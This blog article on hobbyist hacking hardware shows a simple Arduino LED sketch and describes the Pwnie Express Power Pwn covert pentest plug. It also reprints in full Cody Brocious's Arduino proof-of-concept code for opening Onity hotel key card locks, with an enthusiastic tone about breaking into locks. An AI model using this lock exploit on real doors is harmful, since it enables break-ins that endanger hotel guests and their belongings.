Handy Devices Revolution : Handy Pentesting and Hacking Part II
Hello guys, this is my second article about Handy Devices Revolution: Handy Pentesting and Hacking. The first article can be found here: https://resources.infosecinstitute.com/handy-devices-hacking-part-1/
In this article, we will be focusing on the Arduino microcontroller and a power plug-based product from Pwnie Express, as promised in the last part of my first article.
Arduino
Arduino is a well-known piece of open source electronics hardware which is a good device or board for learning microcontrollers more easily and fir enhancing your basic electronics knowledge even if you have no experience in this area. Nowadays, it is used by artists, designers, hobbyists, electronic enthusiasts, hackers, geeks, and programmers for developing applications by using the Arduino Programming Language and the Arduino development environment, which is based on Processing. Applications can be executed from basic input or output through serial communication to LCD and GSM shields. You flash the Arduino board by using the open source software Arduino IDE (Integrated Development Environment), which is compatible with Mac OS X, Linux, and Windows.
The Arduino boards can be purchased from various distributors all over the world. In fact, there are also Arduino clones from electronic stores and institutions, such as the Gizduino from e-Gizmo and the ACEduino 328 from Alexan Commerical.
My very own ACEdunio 328
If you do not have an Arduino board, you can build your own board if you are into electronics by following this tutorial, which includes the schematic diagram, mounting diagram, files, and the manual.
With the power of this board, you can unleash your creativity and build applications such as motor sensors, fire alarms, wireless speakers, chat servers, web servers, a simple keyboard, sequencing lights, motor controllers, voice changers, signal blockers or jammers, and many others (more projects can be found at hackaday). Totally bad ass, right?
Here is a sketch of a simple project I made using just three LEDs, a breadboard, and an ACEduino 328 board to make simple sequencing lights, as cross posted from my girlfriend’s blog:
int led1 = 13; // 1st LED connected to pin 13
int led2 = 12; // 2nd LED connected to pin 12
int led3 = 11; // 3rd LED connected to pin 11
void setup()
{
// setting the three digital pins as outputs
pinMode(led1, OUTPUT);
pinMode(led2, OUTPUT);
pinMode(led3, OUTPUT);
}
void loop()
{
digitalWrite(led1, HIGH); // turns the led ON
delay(100); // waiting time = 100 milliseconds
digitalWrite(led1, LOW); // turns the led OFF
delay(100);
digitalWrite(led2, HIGH);
delay(100);
digitalWrite(led2, LOW);
delay(100);
digitalWrite(led3, HIGH);
delay(100);
digitalWrite(led3, LOW);
delay(100);
}
A simple code or sketch to understand, right? I wrote the sketch in order to show how to convert your board into a simple Christmas light project, since it’s December.
By the way, did you know that a hacker was able to gain access to four million hotel rooms using just his Arduino microcontroller during the Black Hat 2012 security conference in Las Vegas? The man who broke four million hotel rooms secured by Onity programmable key card locks is none other than Cody Brocious, one of Mozilla’s software developers.
Cody Brocious reverse-engineered the Onity locks, so he was able to understand its security measures (or maybe I should say “flaws”). Then he decided to use his Arduino Mega 128 and uploaded a sketch which can be used for unlocking the Onity programmable key card locks. Below is the complete Arduino sketch as posted in his Proof of Concept (PoC) paper:
#define CONSERVATIVE
int ioPin = 3;
#define BUFSIZE 200
unsigned char buf[BUFSIZE];
#define pullLow() pinMode(ioPin, OUTPUT)
#define pullHigh() pinMode(ioPin, INPUT)
unsigned char dbits[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0};
unsigned char bits[][144] = {
{
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1, 0, 1, 0, 0, 0, 1, 0,
0, 1,
1, 0, 0, 0, 1, 0, 0, 0, 1,
1, 0, 1, 0, 0, 1, 0, 1, 1,
1, 1, 0, 0, 0, 0, 1, 1, 1,
0, 0, 0, 1, 1, 1, 0, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0
},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0}
};
unsigned char bval;
void wentLow() {
bval = 1;
}
void setup() {
}
bool open() {
pinMode(ioPin, OUTPUT);
digitalWrite(ioPin, LOW);
pinMode(ioPin, INPUT);
digitalWrite(ioPin, LOW);
for(int i = 0; i < sizeof(dbits); ++i) {
if(dbits[i] == 0) {
pullLow();
delayMicroseconds(16);
pullHigh();
delayMicroseconds(190);
} else {
pullLow();
delayMicroseconds(16);
pullHigh();
delayMicroseconds(56);
pullLow();
delayMicroseconds(16);
pullHigh();
delayMicroseconds(112);
}
}
pullLow();
delayMicroseconds(16);
pullHigh();
bval = 0;
attachInterrupt(1, wentLow, FALLING);
unsigned int i = 0;
while(digitalRead(ioPin) == HIGH && i++ < 32767) {}
if(i == 32767)
return false;
delayMicroseconds(20);
for(int i = 0; i < 164; ++i) {
buf[i] = 0;
pullLow();
delayMicroseconds(8);
pullHigh();
bval = 0;
delayMicroseconds(184);
buf[i] = bval;
}
for(int i = 0; i < 32+3; ++i)
bits[0][50+i] = buf[22+i];
for(int i = 0; i < 8; ++i)
bits[0][86+i] = bits[0][50+i] ^ bits[0][50+9+i] ^ bits[0][50+18+i] ^ bits[0][50+27+i];
bits[0][86] ^= 1;
bits[0][87] ^= 0;
bits[0][88] ^= 1;
bits[0][89] ^= 1;
bits[0][90] ^= 1;
bits[0][91] ^= 0;
bits[0][92] ^= 1;
bits[0][93] ^= 1;
#ifdef CONSERVATIVE
delay(100);
#endif
for(int j = 0; j < 11; ++j) {
for(int i = 0; i < sizeof(bits[j]); ++i) {
if(bits[j][i] == 0) {
pullLow();
delayMicroseconds(16);
pullHigh();
delayMicroseconds(190);
} else {
pullLow();
delayMicroseconds(16);
pullHigh();
delayMicroseconds(56);
pullLow();
delayMicroseconds(16);
pullHigh();
delayMicroseconds(112);
}
}
#ifdef CONSERVATIVE
delayMicroseconds(2700);
#else
delayMicroseconds(500);
#endif
}
return true;
}
void loop() {
open();
}
A brilliant idea indeed, because he just used a very handy device for breaking into the locks. So what’s next? Breaking a bank vault, safety box, and other digital locks? It is possible! You just don’t mess up with the power of Arduino. Here are two projects that I have seen from Thomas Cannon’s website which you could make yourselves busy with:
http://thomascannon.net/projects/hacking-challenge/
http://thomascannon.net/projects/dlp-bypass/
Power Pwn
(Images courtesy of Pwnie Express)
The device that you see in the image above may just look like an ordinary power plug or an extension cord, but it is more than that. This device runs on Debian Linux and is actually a penetration testing platform from Pwnie Express.
Here are its capabilities, specifications and functionalities as described by the product’s official website:
– Onboard high-gain 802.11b/g/n wireless
– Onboard high-gain Bluetooth (up to 1000′)
– Onboard dual-Ethernet
– Fully functional 120/240v AC outlets!
– Includes 16GB internal disk storage
– Includes external unlocked 4G/GSM adapter
– Fully-automated NAC/802.1x/RADIUS bypass!
– Out-of-band SSH access over 4G/GSM cell networks!
– Text-to-Bash: text in bash commands via SMS!
– Simple web-based administration with “Plug UI”
– One-click Evil AP, stealth mode, & passive recon
– Maintains persistent, covert, encrypted SSH access to your target network
– Tunnels through application-aware firewalls & IPS
– Supports HTTP proxies, SSH-VPN, & OpenVPN
– Sends email/SMS alerts when SSH tunnels are activated
– Preloaded with Debian 6, Metasploit, SET, Fast-Track, w3af, Kismet, Aircrack, SSLstrip, nmap, Hydra, dsniff, Scapy, Ettercap, Bluetooth/VoIP/IPv6 tools, and more.
– Unpingable and no listening ports in stealth mode
– Compatible with SIM cards from AT&T, T-mobile, Vodafone, Orange, and GSM carriers in over 160 countries
– HSDPA/UMTS (850/1700/1900/2100MHz)
– GSM/GPRS/EDGE (850/900/1800/1900MHz)
– SIM card not included
Awesome penetration testing device for a power plug design!
Final Words for Part Two
We were able to review two handy devices in this article, but this is not the end of the HandyDevices Revolution: Handy Pentesting and Hacking series. The reason I included only two because I’m reserving some more surprises for the third one, so just stay tuned, guys …
Resources:
http://gerthyjo.blogspot.com/2012/11/getting-started-with-aceduino-328-in.html